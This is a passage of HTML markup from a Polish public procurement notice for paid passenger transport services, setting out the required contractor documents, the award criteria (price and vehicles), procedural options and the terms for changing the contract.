spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. W celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy pzpZamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzieńzłożenia następujących oświadczeń lub dokumentów: 1) informacja z Krajowego Rejestru Karnegow zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy pzp, wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert; 2) zaświadczenie właściwego naczelnika urzęduskarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione niewcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu. 3) zaświadczenie właściwejterenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy RolniczegoUbezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega zopłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, żewykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz zewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawemzwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całościwykonania decyzji właściwego organu. 4) oświadczenie wykonawcy o braku wydania wobec niegoprawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniempodatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tychnależności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumieniaw sprawie spłat tych należności; 5) oświadczenie wykonawcy o braku orzeczenia wobec niegotytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 6) odpis zwłaściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstawwykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy pzp; 7) oświadczenie wykonawcy oniezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12stycznia 1991r. o podatkach i opłatach lokalnych (t. j. Dz. U. z 2018r. poz. 1445 ze zm.). 2. Wprzypadku wspólnego ubiegania się o zamówienie przez wykonawców, dokumenty wymienione wust. 1 pkt 1-7, składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumentyte potwierdzają brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazujebrak podstaw wykluczenia. 3. Wykonawca, który będzie polegał na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej innych podmiotów na zasadach określonych w art. 22austawy pzp, składa w odniesieniu do tych podmiotów dokumenty wymienione w ust. 1 pkt 1-7.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. W celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 ustawy pzpZamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzieńzłożenia następujących oświadczeń lub dokumentów: 1) aktualne zezwolenie lub licencja nazarobkowy przewóz osób wydane na podstawie ustawy z dnia 6 września 2001r. o transporciedrogowym (t. j. Dz. U. z 2019r. poz. 2140 ze zm.). W przypadku gdy zezwolenie lub licencja niejest wymagana - stosowne oświadczenie. 2) wykaz usług wykonanych, a w przypadku świadczeńokresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz zpodaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostaływykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub sąwykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumentywystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeńokresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; wprzypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź innedokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3miesiące przed upływem terminu składania ofert. Wykaz, o którym mowa powyżej musipotwierdzać spełnianie warunku udziału w postępowaniu określonego przez Zamawiającego wSekcji III.1.3) ust. 2 pkt 1) i zostać sporządzony według wzoru stanowiącego Załącznik Nr 6 dosiwz. 1) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wszczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ichkwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonaniazamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją opodstawie do dysponowania tymi osobami. Wykaz, o którym mowa powyżej musi potwierdzaćspełnianie warunku udziału w postępowaniu określonego przez Zamawiającego w Sekcji III.1.3)ust 2 pkt 3) i zostać sporządzony według wzoru stanowiącego Załącznik Nr 8 do siwz. Dokumentypotwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określonąprzez Zamawiającego w Sekcji III.1.2) ust. 2.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykaz dokumentów stanowiących ofertę: 1) Wypełniony formularz ofertowy stanowiący kartętytułową oferty, dostarczony Wykonawcom wraz z siwz (Załącznik Nr 1 do siwz) zawierający: a)nazwę (firma) i adres Wykonawcy, b) cenę oferty w złotych polskich, obliczoną zgodnie zpostanowieniami Rozdziału XVI siwz zatytułowanym „Opis sposobu obliczania ceny oferty”, c)oświadczenie Wykonawcy, informujące zamawiającego, czy wybór oferty będzie prowadzić dopowstania u zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów iusług, ze wskazaniem nazwy usługi, których świadczenie będzie prowadzić do jego powstania, orazich wartości bez kwoty podatku, d) termin wykonania zamówienia publicznego, e) wykazpojazdów, będących w posiadaniu/dysponowaniu Wykonawcy przez cały okres realizacji umowy -wykaz, o którym mowa powyżej, stanowi treść oferty podlegającą ocenie i jednocześnie musipotwierdzać spełnianie warunku udziału w postępowaniu określonego przez Zamawiającego wRozdziale VI ust. 3 pkt 2. Wykaz pojazdów musi zostać sporządzony według wzoru stanowiącegoZałącznik Nr 7 do siwz. f) warunki płatności, g) oświadczenie Wykonawcy, informującezamawiającego, czy zamierza powierzyć podwykonawcy wykonanie części zamówienia, zewskazaniem części zamówienia, których wykonanie zamierza powierzyć podwykonawcom ipodaniem firm podwykonawców, h) oświadczenie Wykonawcy w zakresie wypełnieniaobowiązków informacyjnych wynikających z RODO. 2) Wypełniony Załącznik Nr 3 do siwzzawierający obliczenie oferowanej ceny realizacji zamówienia (obliczoną wraz z podatkiem odtowarów i usług VAT) według sposobu obliczenia oferowanej ceny określonego w Rozdziale XVIsiwz zatytułowanym „Opis sposobu obliczania ceny oferty”. Wykaz oświadczeń i dokumentówdołączonych do oferty: 1) Pełnomocnictwa udzielane osobom podpisującym dokumenty ofertowe,o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost zdokumentu rejestrowego złożone w formie oryginału lub kopii poświadczonej za zgodność zoryginałem przez notariusza. 2) W przypadku wspólnego ubiegania się o zamówienie przezwykonawców, oświadczenia, o których mowa w Sekcji III.3) składa każdy z wykonawcówwspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunkówudziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy zwykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstawwykluczenia. 3) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazaniabraku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje sięna ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach woświadczeniu Wykonawcy, o którym mowa w Sekcji III.3). 4) Wykonawca, który będzie polegał na zdolnościach technicznych lub zawodowych lub sytuacji innych podmiotów na zasadachokreślonych w art. 22a ustawy pzp, w celu wykazania spełnienia warunków udziału wpostępowaniu określonych w Sekcji III.1.2) i III.1.3), musi udowodnić zamawiającemu, żerealizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, wszczególności przedstawiając konkretne i czytelne zobowiązanie tych podmiotów do oddania mu dodyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Niezbędne jest abyzobowiązanie, o którym mowa powyżej zawierało informacje które określają: a) zakres dostępnychwykonawcy zasobów innego podmiotu, b) sposób wykorzystania zasobów innego podmiotu, przezwykonawcę, przy wykonywaniu zamówienia publicznego, c) zakres i okres udziału innegopodmiotu przy wykonywaniu zamówienia publicznego, d) czy podmiot, na zdolnościach któregowykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazanezdolności dotyczą. 3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej, a także w przypadku Wykonawcy, mającego siedzibę na terytoriumRzeczypospolitej Polskiej, którego urzędujący członek organu zarządzającego lub nadzorczego,wspólnik spółki w spółce jawnej lub partnerskiej albo komplementariusz w spółce komandytowejlub komandytowo-akcyjnej lub prokurent, ma miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej, w odniesieniu do wymaganych dokumentów, stosuje się przepisyrozporządzenia Ministra Rozwoju z 26 lipca 2016 roku w sprawie rodzajów dokumentów, jakichmoże żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U z2016r. poz. 1126 ze zm.). 4. Wykonawca, w terminie 3 dni od zamieszczenia na stronieinternetowej informacji, o której mowa w art. 86 ust. 5 ustawy pzp, przekaże Zamawiającemuoświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którejmowa w art. 24 ust. 1 pkt 23 ustawy pzp. Wraz ze złożeniem oświadczenia, wykonawca możeprzedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencjiw postępowaniu o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienieprzez wykonawców, oświadczenie, o którym mowa powyżej, składa każdy z wykonawcówwspólnie ubiegających się o zamówienie</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Środki transportu</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Wszelkie zmiany i uzupełnienia niniejszej Umowy mogą być dokonywane wyłącznie w formiepisemnej pod rygorem nieważności. 2. Strony dopuszczają możliwość zmiany postanowień umowy wstosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następującychprzypadkach: 1) przejścia na następców prawnych praw i obowiązków Wykonawcy, w tymwynikających z niniejszej Umowy, na podstawie pisemnego wniosku Wykonawcy, który wymagaakceptacji Zamawiającego, z tym zastrzeżeniem, iż zmiana umowy w takim przypadku dotyczy tylkozmiany oznaczenia Wykonawcy z zachowaniem pozostałych postanowień umowy, 2) zmiany woznaczeniu firmy (nazwy) Wykonawcy, na podstawie pisemnego wniosku Wykonawcy, który wymagaakceptacji Zamawiającego, z tym zastrzeżeniem, iż zmiana umowy w takim przypadku dotyczy tylkozmiany oznaczenia Wykonawcy z zachowaniem pozostałych postanowień umowy, 3) nastąpi zmianastawki podatku VAT dla usługi będącej przedmiotem niniejszej umowy – zmiana ceny jednostkowejbrutto nastąpi z dniem wejścia w życie aktu prawnego zmieniającego stawkę, cena jednostkowa nettopozostanie bez zmian, 4) w przypadkach opisanych w § 4 ust. 5 niniejszej umowy, 5) w przypadkachopisanych w § 5 ust. 2 niniejszej umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-07-15</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">ZŁOŻENIE OFERTY I OPIS SPOSOBU JEJ PRZYGOTOWANIA: 1. Oferta musi być złożona, podrygorem nieważności, w formie pisemnej albo w postaci elektronicznej opatrzona odpowiedniowłasnoręcznym podpisem albo kwalifikowanym podpisem elektronicznym. 2. Wykonawca, niepóźniej niż w terminie składania ofert, może zastrzec, że wskazane przez niego informacje stanowiącetajemnicę 